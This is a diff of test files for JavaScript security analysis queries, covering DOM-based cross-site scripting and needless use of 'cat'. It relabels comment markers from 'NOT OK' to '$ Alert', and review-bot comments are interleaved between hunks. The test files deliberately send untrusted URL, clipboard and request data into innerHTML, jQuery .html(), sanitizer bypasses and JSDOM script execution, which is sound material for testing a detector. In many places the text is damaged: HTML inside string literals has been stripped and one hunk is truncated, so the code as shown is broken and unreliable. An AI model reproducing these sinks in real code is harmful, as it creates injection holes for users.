function(error, stdout, stderr ) { // OK. - stderr is used. +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // OK - - stderr is used. 
console.log(stderr); }); -execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}, function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'utf8'}); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ]); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ]); // $ Alert var opts = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], opts); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], opts); // $ Alert var anOptsFileNameThatIsTooLongToBePrintedByToString = {encoding: 'utf8'}; -execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], anOptsFileNameThatIsTooLongToBePrintedByToString); // $ Alert -execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // NOT OK +execFileSync('/bin/cat', [ 'pom.xml' ], {encoding: 'someEncodingValueThatIsCompletelyBogusAndTooLongForToString'}); // $ Alert -execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // NOT OK +execFileSync('/bin/cat', [ "foo/" + newPath + "bar" ], {encoding: 'utf8'}); // $ Alert -execSync('cat /proc/cpuinfo' + foo).toString(); // NOT OK. 
+execSync('cat /proc/cpuinfo' + foo).toString(); // $ Alert -execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // NOT OK +execFileSync('/bin/cat', [ `foo/bar/${newpath}` ]); // $ Alert execFileSync('node', [ `foo/bar/${newpath}` ]); // OK - not a call to cat -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -exec("cat foo/bar", (err, out) => doSomethingWith(out)); // NOT OK +exec("cat foo/bar", (err, out) => doSomethingWith(out)); // $ Alert execFileSync('/bin/cat', [ 'pom.xml' ], unknownOptions); // OK - unknown options. @@ -118,13 +118,13 @@ spawn('cat', { stdio: ['pipe', stdin, 'inherit'] }); // OK - Non trivial use. (B cat.stdout.on('end', () => res.end()); })(); -var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK +var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert -var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); // OK +var notDead = exec("cat foo/bar", (err, out) => {console.log(out)}); console.log(notDead); (function () { - var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK + var dead = exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert someCall( exec("cat foo/bar", (err, out) => {console.log(out)}) // OK - non-trivial use of returned proccess. 
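Review bot: Two of the rewritten comments in this hunk carry a doubled separator: the `files.join(' ')` line now reads `// $ SPURIOUS: Alert - - but flagged - not just a simple file read`, and the first stderr-using `execFile('/bin/cat', ...)` callback reads `// OK - - stderr is used.`. The "but flagged" wording is also redundant now that `SPURIOUS` itself records that the alert is reported; `// $ SPURIOUS: Alert - not just a simple file read` and `// OK - stderr is used.` say the same thing cleanly. The touched `execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'})` line still ends its comment with an unbalanced `gid))`.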
@@ -133,34 +133,34 @@ console.log(notDead); return exec("cat foo/bar", (err, out) => {console.log(out)}); // OK - non-trivial use of returned proccess. })(); -const stdout2 = execSync('cat /etc/dnsmasq.conf', { // NOT OK. +const stdout2 = execSync('cat /etc/dnsmasq.conf', { // $ Alert encoding: 'utf8' }); -exec('/bin/cat', function (e, s) {}); // OK +exec('/bin/cat', function (e, s) {}); -spawn("cat") // OK +spawn("cat") var shelljs = require("shelljs"); -shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // NOT OK -shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +shelljs.exec("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}); // $ Alert +shelljs.exec("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert let cspawn = require('cross-spawn'); -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK -cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // NOT OK -cspawn('cat', ['foo/bar']); // NOT OK -cspawn('cat', (err, out) => {console.log(out)}); // OK -cspawn('cat', { encoding: 'utf8' }); // OK +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert +cspawn('cat', ['foo/bar'], { encoding: 'utf8' }, (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar'], (err, out) => {console.log(out)}); // $ Alert +cspawn('cat', ['foo/bar']); // $ Alert +cspawn('cat', (err, out) => {console.log(out)}); +cspawn('cat', { encoding: 'utf8' }); -let myResult = cspawn.sync('cat', ['foo/bar']); // NOT OK -let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // NOT OK +let myResult = cspawn.sync('cat', ['foo/bar']); // $ Alert +let myResult = cspawn.sync('cat', ['foo/bar'], { encoding: 'utf8' }); // $ Alert var execmod = require('exec'); 
-execmod("cat foo/bar", (err, out) => {console.log(out)}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}); // NOT OK -execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // NOT OK +execmod("cat foo/bar", (err, out) => {console.log(out)}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}); // $ Alert +execmod("cat foo/bar", {encoding: 'utf8'}, (err, out) => {console.log(out)}); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js index 97d21371d082..8d4a8cac6d0a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/addEventListener.js @@ -1,16 +1,16 @@ this.addEventListener('message', function(event) { - document.write(event.data); // NOT OK + document.write(event.data); // $ Alert }) this.addEventListener('message', function({data}) { - document.write(data); // NOT OK + document.write(data); // $ Alert }) function test() { function foo(x, event, y) { - document.write(x.data); // OK - document.write(event.data); // NOT OK - document.write(y.data); // OK + document.write(x.data); + document.write(event.data); // $ Alert + document.write(y.data); } window.addEventListener("message", foo.bind(null, {data: 'items'})); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js index 37d3388ee784..1b186b7db6a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular-tempate-url.js 
@@ -1,12 +1,12 @@ angular.module('myApp', []) .directive('myCustomer', function() { return { - templateUrl: "SAFE" // OK + templateUrl: "SAFE" } }) .directive('myCustomer', function() { return { - templateUrl: Cookie.get("unsafe") // NOT OK + templateUrl: Cookie.get("unsafe") // $ Alert } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts index 6d1823c2f601..66cde9439328 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/angular2-client.ts 
@@ -21,29 +21,29 @@ export class AppComponent implements OnInit { ) {} ngOnInit() { - this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(ɵgetDOM().getLocation().href); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.params.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParams.foo); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.fragment); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.paramMap.get('foo')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.queryParamMap.get('foo')); // $ Alert this.route.paramMap.subscribe(map => { - this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(map.get('foo')); // $ Alert }); - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // NOT OK - though depends on route config - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // NOT OK - this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].path); // $ Alert - though depends on route config + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameters.x); // $ Alert + 
this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.get('x')); // $ Alert + this.sanitizer.bypassSecurityTrustHtml(this.route.snapshot.url[1].parameterMap.params.x); // $ Alert - this.sanitizer.bypassSecurityTrustHtml(this.router.url); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(this.router.url); // $ Alert - this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // NOT OK - this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // NOT OK + this.sanitizer2.bypassSecurityTrustHtml(this.router.url); // $ Alert + this.renderer.setProperty(this.document.documentElement, 'innerHTML', this.route.snapshot.queryParams.foo); // $ Alert } someMethod(routeSnapshot: ActivatedRouteSnapshot) { - this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // NOT OK + this.sanitizer.bypassSecurityTrustHtml(routeSnapshot.paramMap.get('foo')); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js index a0e75045a2eb..8cda29a4e952 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/classnames.js 
@@ -4,15 +4,15 @@ import classNamesB from 'classnames/bind'; import clsx from 'clsx'; function main() { - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; // $ Alert let unsafeStyle = classNames.bind({foo: window.name}); - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert let safeStyle = classNames.bind({}); - document.body.innerHTML = `Hello`; // NOT OK - document.body.innerHTML = `Hello`; // OK - document.body.innerHTML = `Hello`; // NOT OK + document.body.innerHTML = `Hello`; // $ Alert + document.body.innerHTML = `Hello`; + document.body.innerHTML = `Hello`; // $ Alert - document.body.innerHTML += `Hello`; // NOT OK + document.body.innerHTML += `Hello`; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts index b87d5a43beea..161a1d6bdd82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/clipboard.ts @@ -12,7 +12,7 @@ function paste(e) { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } 
@@ -21,16 +21,16 @@ function paste(e) { export function install(el: HTMLElement): void { el.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }) } document.addEventListener('paste', (e) => { - $("#id").html(e.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.clipboardData.getData('text/html')); // $ Alert }); $("#foo").bind('paste', (e) => { - $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.clipboardData.getData('text/html')); // $ Alert }); (function () { @@ -47,7 +47,7 @@ $("#foo").bind('paste', (e) => { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -96,6 +96,6 @@ async function getClipboardData(e: ClipboardEvent): Promise if (!dataTransfer) return; const html = dataTransfer.getData('text/html'); - $("#id").html(html); // NOT OK + $("#id").html(html); // $ Alert }); })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js index 9177f08bdc5c..dfa55453917a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/custom-element.js @@ -2,6 +2,6 @@ import * as dummy from 'dummy'; class CustomElm extends HTMLElement { test() { - this.innerHTML = window.name; // NOT OK + this.innerHTML = window.name; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js index 1bb64b48b214..c84f169995cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/d3.js @@ -8,15 +8,15 @@ function doSomething() { d3.select('#main') .attr('width', 100) .style('color', 'red') - .html(getTaint()) // NOT OK - .html(d => getTaint()) // NOT OK + .html(getTaint()) // $ Alert + .html(d => getTaint()) // $ Alert .call(otherFunction) - .html(d => getTaint()); // NOT OK + .html(d => getTaint()); // $ Alert } function otherFunction(selection) { selection .attr('foo', 'bar') - .html(getTaint()); // NOT OK + .html(getTaint()); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js index 47513c796d96..97363f790da1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dates.js 
@@ -8,17 +8,17 @@ function main() { let time = new Date(); let taint = decodeURIComponent(window.location.hash.substring(1)); - document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dateFnsFp.format(taint)(time)}`; // $ Alert document.body.innerHTML = `Time is ${dateFns.format(taint, time)}`; // OK - time arg is safe document.body.innerHTML = `Time is ${dateFnsFp.format(time)(taint)}`; // OK - time arg is safe - document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment(taint).format()}`; // OK - document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment(time).format(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment(taint).format()}`; + document.body.innerHTML = `Time is ${dateformat(time, taint)}`; // $ Alert import dayjs from 'dayjs'; - document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs(time).format(taint)}`; // $ Alert } import LuxonAdapter from "@date-io/luxon"; 
@@ -34,10 +34,10 @@ function dateio() { const moment = new MomentAdapter(); const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // NOT OK - document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dateFns.formatByString(new Date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${luxon.formatByString(luxon.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${moment.formatByString(moment.date(), taint)}`; // $ Alert + document.body.innerHTML = `Time is ${dayjs.formatByString(dayjs.date(), taint)}`; // $ Alert } import { DateTime } from "luxon"; 
@@ -45,18 +45,18 @@ import { DateTime } from "luxon"; function luxon() { let taint = decodeURIComponent(window.location.hash.substring(1)); - document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // NOT OK - document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert + document.body.innerHTML = `Time is ${DateTime.fromISO("2020-01-01").startOf('day').toFormat(taint)}`; // $ Alert } function dateio2() { let taint = decodeURIComponent(window.location.hash.substring(1)); const moment = new MomentAdapter(); - document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert const luxon = new LuxonAdapter(); - document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${luxon.endOfDay(luxon.date()).toFormat(taint)}`; // $ Alert const dayjs = new DayJSAdapter(); - document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // NOT OK + document.body.innerHTML = `Time is ${dayjs.setHours(dayjs.date(), 4).format(taint)}`; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts index 487e51c8f8ad..1d43afdefa91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts 
@@ -12,7 +12,7 @@ function drop(e) { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function drop(e) { export function install(el: HTMLElement): void { el.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }) } document.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }); $("#foo").bind('drop', (e) => { - $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // $ Alert }); (function () { @@ -47,7 +47,7 @@ $("#foo").bind('drop', (e) => { const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js index a48f720bed1a..152a986bbf6e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js @@ -1,4 +1,4 @@ function test() { let loc = window.location.href; - $('click'); // OK + $('click'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js index 5b79cfce8993..8eebe40b4179 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js 
@@ -1,3 +1,3 @@ document.getElementById('my-id').onclick = function() { - this.parentNode.innerHTML = '

A link

'; // NOT OK + this.parentNode.innerHTML = '

A link

'; // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js index cab534d3832c..2d1af9065d35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js @@ -3,9 +3,8 @@ var app = express(); import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - // NOT OK - new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); + new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); // $ Alert + - // OK new JSDOM(req.param("wobble"), { runScripts: "outside-only" }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index 3369df5dd873..f81f545809fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -2,37 +2,37 @@ function test() { var tainted = document.location.search $(tainted); // OK - location.search starts with '?' - $("body", tainted); // OK - $("." + tainted); // OK - $("
"); // NOT OK - $("body").html("XSS: " + tainted); // NOT OK + $("body", tainted); + $("." + tainted); + $("
"); // $ Alert + $("body").html("XSS: " + tainted); // $ Alert $(window.location.hash); // OK - location.hash starts with '#' - $("" + location.toString() + ""); // NOT OK + $("" + location.toString() + ""); // $ Alert // Not related to jQuery, but the handling of $() should not affect this sink let elm = document.getElementById('x'); - elm.innerHTML = decodeURIComponent(window.location.hash); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.search); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.toString()); // NOT OK + elm.innerHTML = decodeURIComponent(window.location.hash); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert let hash = window.location.hash; $(hash); // OK - start with '#' - $(hash.substring(1)); // NOT OK - $(hash.substring(1, 10)); // NOT OK - $(hash.substr(1)); // NOT OK - $(hash.slice(1)); // NOT OK - $(hash.substring(0, 10)); // OK + $(hash.substring(1)); // $ Alert + $(hash.substring(1, 10)); // $ Alert + $(hash.substr(1)); // $ Alert + $(hash.slice(1)); // $ Alert + $(hash.substring(0, 10)); - $(hash.replace('#', '')); // NOT OK - $(window.location.search.replace('?', '')); // NOT OK - $(hash.replace('!', '')); // OK - $(hash.replace('blah', '')); // OK + $(hash.replace('#', '')); // $ Alert + $(window.location.search.replace('?', '')); // $ Alert + $(hash.replace('!', '')); + $(hash.replace('blah', '')); - $(hash + 'blah'); // OK + $(hash + 'blah'); $('blah' + hash); // OK - does not start with '<' - $('' + hash + ''); // NOT OK + $('' + hash + ''); // $ Alert - $('#foo').replaceWith(tainted); // NOT OK - $('#foo').replaceWith(() => tainted); // NOT OK + $('#foo').replaceWith(tainted); // $ Alert + $('#foo').replaceWith(() => tainted); // $ Alert } 
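Review bot: `$(hash.substring(0, 10));` and `$(hash + 'blah');` lose their `// OK` markers while the neighbouring `$(hash); // OK - start with '#'` and `$('blah' + hash); // OK - does not start with '<'` keep theirs, so the reason these two are safe is no longer recorded next to them. Both rely on the same property: `location.hash` is either empty or begins with `#`, so a prefix of it, or it followed by anything, can never start with `<` and be parsed as HTML. I would keep that visible, e.g. `$(hash.substring(0, 10)); // OK - still starts with '#'` and `$(hash + 'blah'); // OK - still starts with '#'`, so a future change to the `#`/`?` prefix sanitizer can be checked against the intent.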
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index 85ad5cef8d43..f9958ea20999 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -28,15 +28,15 @@ app.get("/some/path", function (req, res) { }; // OK + }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 08183d0db7e3..74c96fdae902 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -7,7 +7,6 @@ app.get('/some/path', function (req, res) { var taint = req.param("wobble"); jwt.verify(taint, 'my-secret-key', function (err, decoded) { - // NOT OK - new JSDOM(decoded.foo, { runScripts: "dangerously" }); + new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js index 7ead302724c3..59e96cb9d11e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js @@ -3,5 +3,5 @@ import $ from "jquery" $.post(loginUrl(), {data: "foo"}, (data, xhr) => { var decoded = jwt_decode(data); - $.jGrowl(decoded); // NOT OK - but only flagged with additional sources [INCONSISTENCY] + $.jGrowl(decoded); // $ MISSING: Alert - only flagged with additional sources }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js index 9091f93be7bb..f1fceadbf057 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js @@ -9,7 +9,7 @@ app.post('/private_message', (req, res) => { from: 'webmaster@example.com', to: backend.getUserEmail(req.query.receiver), subject: 'Private message', - text: `Hi, you got a message from someone. ${req.query.message}.`, // OK - html: `Hi, you got a message from someone. ${req.query.message}.`, // NOT OK + text: `Hi, you got a message from someone. ${req.query.message}.`, + html: `Hi, you got a message from someone. ${req.query.message}.`, // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index e8139936bc78..dcec3e388777 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,24 +1,24 @@ function test() { var target = document.location.search - $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); // OK + $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert var tainted = target; - $('myId').html(tainted); // NOT OK + $('myId').html(tainted); // $ Alert if (sanitize) { tainted = DOMPurify.sanitize(tainted); } - $('myId').html(tainted); // OK + $('myId').html(tainted); inner(target); function inner(x) { - $('myId').html(x); // NOT OK + $('myId').html(x); // $ Alert if (sanitize) { x = DOMPurify.sanitize(x); } - $('myId').html(x); // OK + $('myId').html(x); } } 
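Review bot: The first line of the hunk, `$('myId').html(sanitize ? DOMPurify.sanitize(target) : target);`, loses its `// OK` marker and now reads as an ordinary unflagged line, yet when `sanitize` is false it passes `document.location.search` to `.html()` unsanitized, a real XSS that the query, judging by the file name, presumably leaves unreported on purpose because of an optional-sanitizer heuristic. An accepted false negative like that deserves an explicit verdict rather than silence: either `// OK - unsanitized branch is reachable; accepted to avoid noise from conditional sanitizers`, or, if it is meant to be fixed eventually, `// $ MISSING: Alert` as used elsewhere in this patch. The same applies to the two `$('myId').html(tainted)` / `$('myId').html(x)` lines that follow an `if (sanitize) { ... = DOMPurify.sanitize(...) }` block, where the value is likewise still tainted on the false branch.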
